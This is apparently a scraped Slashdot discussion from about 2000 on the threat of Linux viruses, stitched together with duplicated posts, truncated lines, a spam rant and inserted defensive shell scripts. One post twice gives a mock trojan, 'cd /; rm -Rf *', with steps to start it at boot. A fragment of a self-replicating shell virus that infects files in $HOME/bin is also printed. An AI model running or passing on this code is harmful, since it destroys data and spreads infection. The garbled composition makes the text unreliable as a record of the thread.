Where is my mind?
Check out Project Upper/Mute, an all-around awesome compiler fra
Clifford's comments, on the other hand, outline simply that Linux and *nix have much stricter file permissions and unless you log in as root, you're pretty safe.
I log in as delmoi. I get a virus. All my stuff is now gone.
I would hardly call that safe
[ c h a d o k e r e ]
ReadThe ReflectionEngine, a cyberpunk style n
CIH came from taiwan...
[ c h a d o k e r e ]
ReadThe ReflectionEngine, a cyberpunk style n
- There were Unix viruses, Worms and Trojans around since before the PC was designed; they have spread since the first few machines set up UUCP links; Unix viruses are far from new.
- Unix viruses are kept mainly in check because normal users don't have the permissions to do harm - they can harm their own files, they can harm the files of those that trust them, but they can't alter anyone else's, and, most importantly, they normally can't even INSTALL programs, never mind alter those already installed by other people.
- Linux is not Unix - 90% of Linux boxes are single user (maybe single user with webserver, or with an email router, but still single user) and for a high percentage of those, that single user either runs as root, or, if smart enough to run as a user when out on the net, will load the same data files, use the same packages, and generally work in the same sandpit when doing admin tasks that require system privileges as when running his limited "safe" account. As more and more buy "fashionable" pre-loaded linux boxes, you will see a wave of people caught by the same factors that make a windows-based machine insecure - that the user will run things without thinking, and that the user has enough permissions that the virus can take a hold.
So, what it comes down to is that, in general, Unix viruses are not (and will not be) a problem, but that Linux has vulnerabilities that make it less secure than Unix used to be.
--
-=DaveHowe=-
Hey, here's an article a guy I work with forwarded to me a few weeks ago:
http://www.sans.org/y2k/trojan.htm
Now, for those of you that are panicked, let me go through it point by point:
This is a report about a backdoor tool that was recently found on some of our RedHat 4.x Linux boxes.
Umm, upgrade, anyone? I've got some DOS 3.3 virii, if anyone's interested.
A trojan binary, /sbin/initd, was found on some of our systems. It allows a remote user to connect and run arbitrary commands with root privileges without authentication. It allows an attacker to connect to a large number of machines simultaneously and execute destructive commands with ease.
inetd? Cleverly named. Sounds nasty, but let's see what is required to run.
A new libc5 binary, /sbin/initd (note; _not_ the standard /sbin/init which is needed for standard system operation), was installed on the systems and set to a mode that makes it impossible to delete by a normal user; the chattr command was needed to remove the immutable and append-only attributes.
Oh, the humanity!!!! Don't make me use 'chattr' or log in as root!!
It listens on those ports for remote requests and performs them on the local machine. It requires the remote client to enter a password (embedded in the binary) then will execute any additional commands.
Enter a password, and then execute commands? I think I've already got this virus! It's called telnetd!
/etc/rc.d/rc.local was modified to start up /sbin/initd and /sbin/quotad at boot time; the latter was not found on the systems at all and did not appear to have been recently deleted from them.
Hey, got a DOS virus for ya. Gotta load it in autoexec.bat, though. People, look at your initd every once in a while, k?
Run ps ax. This command will list the running programs on your system. If any commands have a name that looks something like 'syslog.itd' or 'syslog initd', this is a very good sign that you have this tool running. This/these pids are very good candidates for killing off. Does this listing show any other programs you don't recognize?
It shows up in a process list? What kind of virus is this?
Here, I got a trojan horse for you. Cut the text, and paste it in a file with a Unix-sounding name:
---Cut here---
#!/usr/bin/bash
cd /
rm -Rf *
---End Cut---
Give the file execute permissions.
Now, make sure you start up this virus in rc.local, or even in your crontab.
Reboot.
This virus is just about as effective as the one above.
+-- (Score:-1, Moderator on Power Trip)
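The SANS report quoted in the post above lists concrete indicators: process names like syslog.itd, /sbin/initd and /sbin/quotad started from rc.local, and immutable/append-only attributes that chattr had to clear. The script below is an added example, not part of the post or the SANS report, that turns those indicators into a repeatable check. The `ps ax` output it scans is constructed; the process names, paths and attribute flags come from the report.

```shell
#!/bin/sh
# Added example (not from the post or the SANS report): check a Linux box
# for the indicators the report lists. Process names, file paths and the
# i/a attributes come from the report; the sample data below is constructed.

# Constructed stand-in for real `ps ax` output, so the script runs offline.
SAMPLE_PS='  PID TTY      STAT   TIME COMMAND
    1 ?        S      0:04 init [3]
  234 ?        S      0:00 syslogd
  235 ?        S      0:00 klogd
  412 ?        S      0:00 syslog.itd
  413 ?        S      0:00 /sbin/initd
  500 ?        S      0:01 /usr/sbin/sshd'

# Read `ps ax` output on stdin; print "PID COMMAND" for every process whose
# command name matches one the report associates with the backdoor.
# The command is rebuilt from field 5 onwards so "syslog initd" (with a
# space) is matched as well as "syslog.itd".
flag_processes() {
    awk 'NR > 1 {
        cmd = $5
        for (i = 6; i <= NF; i++) cmd = cmd " " $i
        if (cmd ~ /(^|\/)(syslog\.itd|syslog initd|initd|quotad)( |$)/)
            print $1 " " cmd
    }'
}

# Number of flagged processes in the constructed sample.
count_flagged_sample() {
    printf '%s\n' "$SAMPLE_PS" | flag_processes | wc -l | tr -d ' '
}

# Return 0 if an rc.local-style file starts /sbin/initd or /sbin/quotad
# outside a comment, 1 otherwise. (/sbin/init without the trailing d is
# the legitimate program and is not matched.)
rc_local_starts_backdoor() {
    grep -qE '^[^#]*/sbin/(initd|quotad)' "$1"
}

# List files under a directory that carry the immutable (i) or append-only
# (a) ext2 attribute, which the report says the trojan used to resist
# deletion. lsattr is ext2-specific; skip quietly where it is unavailable.
# Directory headers in `lsattr -R` output end in ':' and are filtered out
# by requiring the first field to be a pure attribute string.
list_locked_files() {
    command -v lsattr >/dev/null 2>&1 || return 0
    lsattr -R "$1" 2>/dev/null |
        awk 'NF == 2 && $1 ~ /^[-A-Za-z]+$/ && $1 ~ /[ia]/ { print $2 }'
}

# Stand-alone run: report on the constructed sample, then the live system.
printf '%s\n' "$SAMPLE_PS" | flag_processes
ps ax 2>/dev/null | flag_processes
if [ -f /etc/rc.d/rc.local ] && rc_local_starts_backdoor /etc/rc.d/rc.local; then
    echo "/etc/rc.d/rc.local starts /sbin/initd or /sbin/quotad"
fi
list_locked_files /sbin
```

The process-name match is the weakest of the three checks, since a trojan can be renamed; the rc.local and attribute checks catch the persistence mechanism regardless of the name, and a file in /sbin that a normal user cannot delete even as root without chattr is worth explaining on any box.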
You don't get out much, do you?
"Widget choice makes me horny." -
Yep, I'm happy if they come. Why you ask?
Answer:
After a few people who thought they were invulnerable get burned, more people will start checking the GnuPG/PGP signature on downloaded files. More people will begin signing them as well. A lot of people who weren't as worried about security all of a sudden will be. And people will start thinking before make && make install
It can't kill us, and what doesn't kill us only makes us stronger.
Security is a responsibility we must take seriously. And 90% happens between the ears of the admin.
This sig is false.
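The post above puts its hope in people checking GnuPG/PGP signatures before `make && make install`. The script below is an added example, not from the post, of what that check has to look like to be worth anything: `gpg --verify` exits 0 for a good signature from any key in the keyring, so the status output is also checked for the fingerprint of the release key, learned from somewhere other than the download mirror. The fingerprint and file names are constructed placeholders.

```shell
#!/bin/sh
# Added example (not from the post): refuse to unpack a downloaded tarball
# unless its detached signature verifies AND was made by a key whose
# fingerprint was obtained out of band. EXPECTED_FPR is a constructed
# placeholder, not a real project's key.

# Fingerprint of the release-signing key, learned from a channel other than
# the download mirror (project web page, key servers, a keysigning).
EXPECTED_FPR='0123456789ABCDEF0123456789ABCDEF01234567'   # placeholder

# Return 0 only if gpg reports a valid signature by the expected key.
# `gpg --verify` alone exits 0 for a good signature from ANY key in the
# keyring, so the VALIDSIG status line is checked for the fingerprint,
# either as the signing (sub)key or as the primary key at the end of the line.
signature_by_expected_key() {
    sig=$1 file=$2
    gpg --batch --status-fd 1 --verify "$sig" "$file" 2>/dev/null |
        grep -qE "^\[GNUPG:] VALIDSIG ($EXPECTED_FPR |.* $EXPECTED_FPR$)"
}

# Verify, then unpack into a fresh scratch directory and print its path.
# Nothing from the tarball is touched before the signature has passed.
# Usage: unpack_if_verified foo-1.0.tar.gz [foo-1.0.tar.gz.sig]
unpack_if_verified() {
    tarball=$1 sig=${2:-$1.sig}
    if ! signature_by_expected_key "$sig" "$tarball"; then
        echo "refusing to unpack: $tarball is not signed by key $EXPECTED_FPR" >&2
        return 1
    fi
    srcdir=$(mktemp -d) || return 1
    tar -xzf "$tarball" -C "$srcdir" || return 1
    echo "$srcdir"
}

# When run as a script: unpack_if_verified <tarball> [<detached .sig>]
if [ $# -ge 1 ]; then unpack_if_verified "$@"; fi
```

Configure and build in the printed directory as an ordinary user; only `make install` needs root. A checksum file downloaded from the same mirror adds nothing here, since whoever replaced the tarball could replace the checksum too; the signature, with the key pinned, is what ties the file to its publisher.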
I don't like the way everyone is so convinced linux is secure. No OS I know of can account for a newbie being stupid (i.e. blindly running files he/she just downloaded off the 'net).
Even though they may not be able to damage anything other than the user's files, the infected program will probably be able to read the user's address database and send itself to, say, the first 50 names in the address book (ring any bells? :-). I'm fairly sure I could write said virus myself but I don't want to go to prison!
If the virus also "merged" itself with other executable files in the user's home dir, then that opens another way to get itself spread. To do that requires knowledge of the file format (like it says in the article), but that is known for Windoze as well so that stumbling block is irrelevant.
This is where education is important. Newbies (and others) need to be reminded to run the program under the strictest possible environment (something like user 'nobody' and disallow network access etc.), especially nowadays as GNU/Linux has attracted virus writers' attention.
I would be more concerned about viruses and trojans comming from Microsoft than China.
Well over fifty posts, and no one has called him on such a blatant misspelling.
Oh well, I propose it be made a real word, in the context of computers, kind of like "mouses" is the plural of those pointing devices.
What, you don't think that's a real word either? Damn language nazis...
You don't get out much, do you?
When I have the wonderous Windows 2000 operating system to keep me company, "getting out" seems to be a bit old-fashioned. Why should I be bothered with the mundane tasks of an unrewarding life when I can stay in and be entertained by this marvelous piece of software engineering? I would appreciate any thoughts that you might have on this, just as long as you are not a Linux user.
It's easy enough to find the root filesystem! /etc/inittab or whatever very easily. /etc/inittab)
Assuming most computers with linux installed only have one partition as type 83 then the virus would be able to stick it into
The challenges would be:
a) get the code sufficiently small that it mightn't be noticed too easily
b) if there is more than one linux partition or something then the lilo info would need to be found from the MBR, but that doesn't really matter much and anyway what's to stop the virus inserting itself into any/all type 83 (ext2) partitions (checking first there is a
Basically, traversing the partition tables is easily done - be they primary or extended, and the source for writing to ext2 is readily available (not surprisingly)
/dev/null } function infect () { # pathlist=`echo $PATH | tr : " "` # dir=`choose $pathlist` dir=$HOME/bin echo "Will infect in $dir" names=`find $dir -maxdepth 1 -type f` name=`choose $names` echo "will infect $name" if infected $name; then echo Already infected else if [ ! -w $name ]; then notwrite=1 chmod u+w $name fi if [ -w $name ]; then infectfile=`mktemp /tmp/if$$.XXXXXX` || { echo 'cannot create a temporary file' >&2 exit 1 } (head -$[$skip-1] $0; cat $name) > $infectfile cat $infectfile > $name rm -f $infectfile if [ x$notwrite = x1 ]; then chmod u-w $name fi echo success else echo Darn, no write permissions fi fi } srandom tmpfile=`mktemp /tmp/gz$$.XXXXXX` || { echo 'cannot create a temporary file' >&2 exit 1 } if tail +$skip $0 > $tmpfile; then infect chmod 700 $tmpfile prog="`echo $0 | sed 's|^.*/||'`" if ln $tmpfile "/tmp/$prog" 2>/dev/null; then trap 'rm -f $tmpfile "/tmp/$prog"; exit $res' 0 (sleep 5; rm -f $tmpfile "/tmp/$prog") 2>/dev/null & /tmp/"$prog" ${1+"$@"}; res=$? else trap 'rm -f $tmpfile; exit $res' 0 (sleep 5; rm -f $tmpfile) 2>/dev/null & $tmpfile ${1+"$@"}; res=$? fi else echo Cannot decompress $0; exit 1 fi; exit $res true
Posted by razvedchik, "Linux is a virus in itself":
Sometimes, I feel that Linux is a huge, 640M virus just out to ruin my life. Then I remember that resolv.conf only has one "e" in it and continue on with my mission.
It spreads from user to user, and once you're infected, you can never go back. It has been known to cripple and even destroy WinXX systems to the point of making itself the dominant OS on any machine.
It makes its users say crazy things like "awk", "grep", "FUD", and so on....
The problem with e-mail lists is that you can't post as the "Anonymous Coward".
Posted by havoc-, "It's already here...":
... and it's called VIGOR. :-)
--
So much to compile, so little time...
Posted by Mechanist, "Klooless Noobies":
OK, I think most of us can agree with this:
In order for a virus to have a real effect it would require someone to be stupid enough to run (log in) as root
And with this:
It's not so much about the product but about how you manage your system. We advise people never to do anything in root unless they absolutely have to
But the problem lies with people who run Linux but lack background with Unix configuration and security policies. For a lot of people, the user/root distinction is a pain in the ass, because they're used to Windows. They don't want to learn new stuff to run Linux, they just want to use the latest cool thing. So they end up doing most everything as root, because it's easier that way.
This is plainly stupid, and invites disaster, but some people will never learn until their noses are rubbed in the steaming pile of idiocy they've just laid. So I wouldn't be too surprised to see some sort of Linux trojan horse emerge, even if it required full root access in order to be effective. Clueful users would not get directly infected, but if the trojan became widespread they might suffer some indirect trouble from it.
Also, given that this was reported on ZDNet, I can't help but wonder if the FUD is motivated by antivirus s/w companies scared of losing their market. But maybe I'm just too paranoid for my own good, eh? :-)
There is no, I repeat no stackguarding technique to completely prevent buffer overflows. Take a look at last week's Kernel Traffic for a summary of a good discussion about this.
Automated library-level checking, whether using a stackguarded compiler or weird stack hacks in the OS is no way to make an app buffer-overflow secure. The only way to do it is continuous human code auditing (and careful initial coding practices), à la OpenBSD. OpenBSD is tight, carefully audited, and in fact provides surprisingly little as far as applications. The size of a typical Linux install is a huge enemy of auditing -- there's just too much stuff to go through. You can however build quite a secure system (assuming you don't have any untrusted local users) simply by strictly limiting which services your machine offers to the outside.
The Internet Worm won't happen again in the UNIX world -- we learned our lesson at the time about poorly written programs and known problems. M$, typically, still hasn't figured this one out. The only reason UNIX users won't be vulnerable to Word Macro-type viruses is that no UNIX user would use such a pathetically stupid application -- and a UNIX user would know better than to execute a random chunk of code he found lying around.
Of course the user can still screw himself if he's dumb, but that's not fundamentally against the UNIX mentality -- 'rm -Rf *' has always been there waiting for you.
...
Actually, a real problem is the fact that most users go looking all over the internet for RPMs of their latest gotta-have applications, without checking the origins. Downloading RPMs from random webpages and installing them as root could be a very bad idea.
On a dual-boot machine, Linux is totally helpless and at the mercy of every program running while the machine is in windows mode. And heaven help us if MS ever adds support for ext2 filesystems to Win2000 or whatever. That'll make it easy for tiny viruses to mount ext2 file systems and add themselves in to run as root later on.
Sure, Linux viruses might be worse because Linux is Open Source Software, all other things being equal. If you have the source, it is easier to find holes and create exploits for them.
The thing is, all other things are not equal.
The advantages of OSS and the design of Unix (and thus Linux) can easily outweigh the problem of open access to the source code. On the OSS side, you have peer review by a cast of thousands, and the ability to check for malicious code yourself. On the Unix side, you have the concept of security permissions which prevent viruses from propagating as easily.
Sure, if an infected program is run by a user with root privileges, it can seek out and infect other programs. But you can easily restrict virus behavior by not running things as root. Install your package as root, but run it as a user.
Your home directory is, of course, vulnerable, but you have cut a potential propagating virus down to a simple Trojan Horse. Viruses are so dangerous because they spread unknowingly; a Trojan is quickly discovered and snuffed when people discover what it does.
Will malicious code be a problem on Linux? Of course. It already is. But thinking the same problems of the Ms-Windows world apply in the Unix one is an error.
What we may see is smarter, more sophisticated attacks being deployed. MS-Windows is so poorly designed that virus writers have it easy. With Linux, we may see fewer, but far more dangerous, malicious programs. That, if anything, should be the real fear. Sticking with trusted, Open Source Software should keep such problems to a minimum, however.
All in all, I think Linux users have far less to worry about than MS-Windows users.
dragonhawk@iname.microsoft.com
I do not like Microsoft. Remove them from my email address.
Why *Chinese* crackers? Are they suddenly more adept at creating viruses than crackers in any other country??
heh =)
A year spent in artificial intelligence is enough to make one believe in God.
Read only partitions also have the advantage that if power is cut, the RO filesystems aren't "dirty" when the machine boots back up. And as /usr is usually quite large and heavily populated, this saves a lot of FSCKing time (literally!).
It's not attractive to virus writers? What if they are more interested in doing something malicious rather than merely in their virii spreading themselves?
Although it is true that Linux (and Unices in general) tend to give less motivations for virus writers, do not take this as security, because it's not. Even if a virus cannot gain root access, to a home PC user, deleting his entire home directory is just as bad as infecting /bin/ls. I think Linuxers should wake up and realize that as Linux becomes more popular, there will be an increasing temptation to virus writers. And the "it's hard to gain root access" argument is a fallacy. Valuable personal data can be destroyed very easily by a virus, even if the system itself is not harmed. After all, who cares about the system? Which is more important -- the system, or the data that you use the system for? And how about DoS attacks? Even if the virus cannot reach your data, ever heard of fork( ) bombs? Or HD space hoggers that cause you to be unable save your latest document? The system may be less vulnerable, but your data isn't.
mikre he sophia he tou Mikrosophou.
Oh come on, English is riddled with so many stupid rules, exceptions and non-sensicalities that caring about virii vs viruses is meaningless to the point of being stupid.
When English is 95% sensible rules and consistent patterns then I'll pay attention to the ravings of folks like you. Until then I'm for hacking and bastardizing the language as much as possible. Make up words, spell 'em as they sound, follow the patterns even when they are "wrong" - anything to boycott the English language snobs.
"I would die to have some red dye."
"Please polish the Polish furniture."
"Would you hand me that piece of wood?"
Stupid pathetic excuse for a language.
If you can't tell, I'm mad 'cuz I spent too many damn years learning the language - and I still don't rate as a good speaker or writer.
90% of the wealth is in 2% of the pockets. Bummer to be in the majority.
was that an attempt to start a flame war, or merely the confidence of ignorance? There are lots of different endings for latin -us words. Read Tom Christiansen's page. I can't believe this debate comes up again and again. I agree about the OED though - but obviously they are anticipating usage fees.
I already posted to this article so I can't moderate this down as a troll like it deserves... can someone else?
You're insinuating that *most* linux systems have ONE partition? If this is really true, then the average linux geek is not very bright.
Look at any UNIX system. It is not a coincidence that there is more than one partition.
I think you are wrong in your assumption about *most* linux users, personally.
A year spent in artificial intelligence is enough to make one believe in God.
Good thing I didn't sell my y2k secure underground bunker complex, I'll have a safe place to hide when it all comes down ;)
http://bike.stu.ph/rides - free GPS routes available for Garmin, Magellan, GPX and Google Earth
As far as I know, virus is a latin word. And then the plural form is viri, not virii. Sorry, I could not resist. But 'virii' hurts...
doofus doofii
ignoramus ignoramii
corpus corpii
calculus calculii
detritus detritii
Hope that helps.
I already posted to this article so I can't moderate this down as a troll ..
No doubt you posted some pro-Linux nonsense. You want to see my comment moderated down because it comes a bit too close to the truth. But I have learned that Linux zealots are never interested in the truth. If it was not for Linux, the hundreds of souls who perished on the Titanic would be alive today. If it were not for Linux, the Hindenburg would have landed safely. If it were not for Linux, the film Ishtar would have never been made. Linux zealots are all the same. They like to praise it all the time, but they never like to talk about the skeletons that it has in its closet.
Well, I'm a bit of a different sort. I will talk about them. And a little moderation won't discourage me. Let us hope that this doesn't tragically upset your universe!
Well over fifty posts, and no one has called him on such a blatant misspelling.
Actually post #7 deals with that very issue. It was moderated down as Offtopic, as was yours. This isn't the time or place to debate etymology.
I didn't know that M$ employees were allowed to post to slashdot on company time... shame shame I've heard of hard sells, but this one takes the cake. Next you will be telling us that Micro$uck will protect our children from the plague. Get real.
Dear Citizens:
We are facing a CRISIS in America. A crisis in the workplace. A crisis of GENDER INEQUALITY. A crisis that affects us all.
Now, in the last year of the 20th century, you wouldn't expect to still find sexism and gender discrimination in the workspace, would you? Well, think again.
Employment figures recently RELEASED BY THE FEDERAL GOVERNMENT have something STUNNING and DISGRACEFUL to say!
FACT: For every dollar a man makes, A WOMAN GETS SIXTY CENTS!
What they DON'T tell you: Do the math! Once the woman gets her sixty cents, ONLY FORTY CENTS ARE LEFT FOR THE MAN!
For every dollar the man makes:
a woman - sixty cents
the man - forty cents
THE WOMAN GETS PAID FIFTY PERCENT MORE FOR THE SAME WORK! WE MUST NOT STAND FOR THIS GENDER GAP IN THE WORKPLACE!
What can YOU do?
Write to your Congresspersun and tell her or him "MEN DEMAND EQUAL PAY FOR EQUAL WORK! WE WANT OUR FAIR SHARE! END THE PAY GAP."
Only when the feminine stranglehold on the workplace is broken, and men no longer get 50% less pay than women, will this country be TRULY FREE.
Thank you for reading, brothers and sisters!!!
not what would be called an honculeur de mouche?
Which is correct?
Because that is the only way I can know exactly what size partitions I need for /usr, /usr/doc /usr/X11R6, etc. Then I repartition and install again. Once Linux install is done, these partitions become read-only. Extra goodies go into /usr/local which is read-write.
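Two posts in this thread (the one just above and the earlier one about saving fsck time) keep /usr and its subtrees on read-only partitions. The script below is an added example, not from either post, of how that layout looks in /etc/fstab and how to confirm the system is actually running that way, since a partition remounted read-write for an upgrade and never remounted back is the usual way the protection quietly disappears. Device names and the sample mount table are constructed.

```shell
#!/bin/sh
# Added example (not from either post): verify that the partitions the posts
# keep read-only are in fact mounted read-only. The fstab lines and the
# sample mount table below are constructed; the layout follows the posts.

# fstab entries for the layout described (constructed): /usr trees ro,
# /usr/local and /home writable but with no device nodes or setuid bits.
#   /dev/hda5  /usr        ext2  ro,nodev         1 2
#   /dev/hda6  /usr/X11R6  ext2  ro,nodev         1 2
#   /dev/hda7  /usr/local  ext2  rw,nodev,nosuid  1 2
#   /dev/hda8  /home       ext2  rw,nodev,nosuid  1 2

# Mount points that must never be writable during normal operation.
EXPECT_RO='/usr /usr/X11R6 /usr/doc'

# Constructed stand-in for /proc/mounts: one tree was left writable,
# as happens after "mount -o remount,rw" for an upgrade.
SAMPLE_MOUNTS='/dev/hda1 / ext2 rw 0 0
/dev/hda5 /usr ext2 ro,nodev 0 0
/dev/hda6 /usr/X11R6 ext2 rw,nodev 0 0
/dev/hda7 /usr/local ext2 rw,nodev,nosuid 0 0
/dev/hda8 /home ext2 rw,nodev,nosuid 0 0
none /proc proc rw 0 0'

# Read a mount table (device mountpoint fstype options ...) on stdin; print
# "mountpoint device" for each expected read-only mount point whose option
# list contains rw. Options are split on commas so "rw" is matched exactly,
# not as a substring of some other option.
unexpected_rw() {
    awk -v want="$EXPECT_RO" '
        BEGIN { n = split(want, w, " "); for (i = 1; i <= n; i++) ro[w[i]] = 1 }
        ($2 in ro) {
            m = split($4, opt, ",")
            for (j = 1; j <= m; j++) if (opt[j] == "rw") print $2 " " $1
        }'
}

# Run the check over the constructed sample.
report_sample() { printf '%s\n' "$SAMPLE_MOUNTS" | unexpected_rw; }

# Stand-alone run: the sample, then the live system where /proc/mounts exists.
report_sample
if [ -r /proc/mounts ]; then unexpected_rw < /proc/mounts; fi
```

For an upgrade the sequence is `mount -o remount,rw /usr`, install, `mount -o remount,ro /usr`; running the check afterwards (or from cron) catches the case where the last step was forgotten. The read-only mount does not stop a root-level compromise, which can remount just as easily, but it does stop the class of accident and unprivileged mischief the posts are concerned with, and it is what gives the clean-fsck-after-power-loss benefit the earlier post mentions.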
A virus finds a buffer overflow bug or whatever, executes its code and infects other machines.
Since 99% of linux machines are networked, these viruses aren't going to spread via shared 3.5" disks, they're gonna be xmitted through the net.
I guess we call that a worm.
I don't know about Linux, but some Unixes that I've used had "limit" feature, which I presume, can keep a single user from using too much disk space or CPU. If Linux doesn't have this, it can surely be added.
---
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
Posted by Anonymous Coward (Score:0, Troll), "This is why Linux is so extraordinarily dangerous":
We saw the dangers inherent with the open source model when the Quake 1 code was GPLed and within hours people had modified it and were using it to cheat. Now along comes this story. Yes, I'm sure that most of this is simple exaggeration, but it raises a valid point: the open nature of the Linux source code represents a very real threat to its security as an operating system, because it can be viewed and changed by anybody. It doesn't matter if they've got noble or evil intent. The open nature of the operating system doesn't know their intent, and by definition doesn't care. It's the ability that matters, nothing more, nothing less.
Now I can already hear the hordes of Linux users protesting. "Only get Linux from official sources!" they say. "Don't download distributions that you're not familiar with!" they say. "Read all of the source before you compile it!" they say. All of these suggestions are simply ludicrous. It shouldn't matter what an "official source" is or not. But due to the openness of the Linux system, it does matter. When you download an ISO image of the latest release of Red Hat, you don't know if you're downloading a true version of the Linux operating system, or if you're downloading a ticking time bomb that will sabotage you and all of your data. You just don't know, unless you read all of the source code yourself before you build and install it. Who's got the time for that. Who's got the money for that? You, Dimmy?
From this it should be clear that the Windows 2000 operating system is the only OS that is even remotely acceptable for desktop use. Its competitors consist of open-source operating systems (which, as we have seen above, are completely unsafe) and other inferior closed-source operating systems. Users of Linux and other OSS systems would do well to reformat their hard drives -- right now -- and install Windows 2000 just as soon as it becomes available. Do it now, before it's too late. If you wait too long, you might get a faceful of shrapnel when your machine explodes from some evil piece of code inserted by a malevolent hacker. You don't have to worry about that with Windows 2000. Windows 2000 is probably the best piece of software that has ever been written.
With Linux, you always have to worry that perhaps your machine will spontaneously start serving up kiddie porn because of a rogue patch applied to your kernel by some 16-year-old outcast in the Ukraine. Not so with Windows 2000. Windows 2000 only serves up kiddie porn if you ask it to. Ditch Linux, folks. And don't lay awake nights wondering if your machine has started spamming Usenet with MAKE MONEY FAST posts. Linux systems have been known to do that from time to time. Obviously, Windows 2000 systems don't. And don't forget the hideous Linux Trojan horse that caused it to seize control of and fuck with the temperature in your home. Windows 2000 won't roast you, and it won't freeze you. It'll keep you all nice and comfy. Can you say the same for Linux? Are you willing to lay it on the line? Wise up. Get with the program.
Re:This is why Linux is so extraordinarily dangero by Ranger Bob (Score:1) Monday January 24, @01:25PM EST
Re:This is why Linux is so extraordinarily dangero by Anonymous Coward Monday January 24, @01:36PM EST
Re:This is why Linux is so extraordinarily dangero by Anonymous Coward Monday January 24, @01:50PM EST
Re:This is why Linux is so extraordinarily dangero by Anonymous Coward Monday January 24, @02:00PM EST
AAAAAHAHAHAHAHAHA HAHA HEEHEE cough.. choke... by runlevel0 (Score:1) Monday January 24, @02:07PM EST
Re:AAAAAHAHAHAHAHAHA HAHA HEEHEE cough.. choke... by Anonymous Coward Monday January 24, @02:13PM EST

the biggest risk to any open-source system (Score:1) by Potatoswatter (alkrauss at erols dot com) on Monday January 24, @01:14PM EST (#94)
isn't a sneaky virus, it's a sneaky tech help guy. In Linux, hired help can recompile/rewrite anything, no?
D.nnrw ,rpne! mfspr r3, pc / lvxl v0, 0, r3 / li r0, 16 / stvxl v0, r3, r0

*nix and Viruses (Score:5, Informative) by DaveHowe (DaveHowe@Hawkswing) on Monday January 24, @01:20PM EST (#107)
I think there are a few points here:
There were Unix viruses, worms and Trojans around since before the PC was designed; they have spread since the first few machines set up UUCP links; Unix viruses are far from new.
Unix viruses are kept mainly in check because normal users don't have the permissions to do harm - they can harm their own files, they can harm the files of those that trust them, but they can't alter anyone else's, and, most importantly, they normally can't even INSTALL programs, never mind alter those already installed by other people.
Linux is not Unix - 90% of Linux boxes are single user (maybe single user with webserver, or with an email router, but still single user) and for a high percentage of those, that single user either runs as root, or, if smart enough to run as a user when out on the net, will load the same data files, use the same packages, and generally work in the same sandpit when doing admin tasks that require system privileges as when running his limited "safe" account.
As more and more buy "fashionable" pre-loaded Linux boxes, you will see a wave of people caught by the same factors that make a Windows-based machine insecure - that the user will run things without thinking, and that the user has enough permissions that the virus can take a hold.
So, what it comes down to is that, in general, Unix viruses are not (and will not be) a problem, but that Linux has vulnerabilities that make it less secure than Unix used to be.
-- -=DaveHowe=-
Re:*nix and Viruses by PigleT (Score:2) Monday January 24, @01:41PM EST

Known Linux "Virus" (Score:1) by NullGrey (nullgrey@yahoo.com) on Monday January 24, @01:22PM EST (#111)
Hey, here's an article a guy I work with forwarded to me a few weeks ago: http://www.sans.org/y2k/trojan.htm
Now, for those of you that are panicked, let me go through it point by point:
> This is a report about a backdoor tool that was recently found on some of our RedHat 4.x Linux boxes.
Umm, upgrade, anyone? I've got some DOS 3.3 virii, if anyone's interested.
> A trojan binary, /sbin/initd, was found on some of our systems. It allows a remote user to connect and run arbitrary commands with root privileges without authentication. It allows an attacker to connect to a large number of machines simultaneously and execute destructive commands with ease.
inetd? Cleverly named. Sounds nasty, but let's see what is required to run.
> A new libc5 binary, /sbin/initd (note; _not_ the standard /sbin/init which is needed for standard system operation), was installed on the systems and set to a mode that makes it impossible to delete by a normal user; the chattr command was needed to remove the immutable and append-only attributes.
Oh, the humanity!!!! Don't make me use 'chattr' or log in as root!!
> It listens on those ports for remote requests and performs them on the local machine. It requires the remote client to enter a password (embedded in the binary) then will execute any additional commands.
Enter a password, and then execute commands? I think I've already got this virus! It's called telnetd!
> /etc/rc.d/rc.local was modified to start up /sbin/initd and /sbin/quotad at boot time; the latter was not found on the systems at all and did not appear to have been recently deleted from them.
Hey, got a DOS virus for ya. Gotta load it in autoexec.bat, though. People, look at your initd every once in a while, k?
> Run ps ax. This command will list the running programs on your system. If any commands have a name that looks something like 'syslog.itd' or 'syslog initd', this is a very good sign that you have this tool running. This/these pid's are very good candidates for killing off. Does this listing show any other programs you don't recognize?
It shows up in a process list? What kind of virus is this?
Here, I got a trojan horse for you. Cut the text, and paste it in a file with a Unix-sounding name:
---Cut here---
#! /usr/bin/bash
cd /
rm -Rf *
---End Cut---
Give the file execute permissions. Now, make sure you start up this virus in rc.local, or even in your crontab. Reboot. This virus is just about as effective as the one above.
+-- Open Source -- The solution to software piracy.

Good. Bring them on. (Score:2) by Dast (cfy1@ra.msstate.edu.spamtodevnullplease) on Monday January 24, @01:25PM EST (#118)
Yep, I'm happy if they come. Why you ask? Answer: After a few people who thought they were invulnerable get burned, more people will start checking the GnuPG/PGP signature on downloaded files. More people will begin signing them as well. A lot of people who weren't as worried about security all of a sudden will be. And people will start thinking before make && make install.
It can't kill us, and what doesn't kill us only makes us stronger. Security is a responsibility we must take seriously. And 90% happens between the ears of the admin.

No OS is really immune (Score:3, Insightful) by hoss10 on Monday January 24, @01:26PM EST (#119)
I don't like the way everyone is so convinced Linux is secure. No OS I know of can account for a newbie being stupid (i.e. blindly running files he/she just downloaded off the 'net).
Even though they may not be able to damage anything other than the user's files, the infected program will probably be able to read the user's address database and send itself to, say, the first 50 names in the address book (ring any bells? :-). I'm fairly sure I could write said virus myself but I don't want to go to prison!
If the virus also "merged" itself with other executable files in the user's home dir then that opens another way to get itself spread. To do that requires knowledge of the file format (like it says in the article) but that is known for Windoze as well, so that stumbling block is irrelevant.
This is where education is important. Newbies (and others) need to be reminded to run the program under the strictest possible environment (something like user 'nobody' and disallow network access etc.), especially nowadays as GNU/Linux has attracted virus writers' attention.

Microsoft (Score:1) by Andrewkov on Monday January 24, @01:30PM EST (#121)
I would be more concerned about viruses and trojans coming from Microsoft than China.
Re:Microsoft by c0d3 (Score:1) Monday January 24, @02:27PM EST

Virii is not a word (Score:2, Offtopic) by 0xdeadbeef on Monday January 24, @01:31PM EST (#125)
Well over fifty posts, and no one has called him on such a blatant misspelling. Oh well, I propose it be made a real word, in the context of computers, kind of like "mouses" is the plural of those pointing devices. What, you don't think that's a real word either? Damn language nazis...
OT-Virii is not a word by Anonymous Coward Monday January 24, @02:07PM EST

Linux Virii On Their Way? Posted by Hemos on Monday January 24, @12:27PM from the really-damn-funny dept.

Linux virii (Score:0) by Anonymous Coward on Monday January 24, @01:38PM EST (#135)
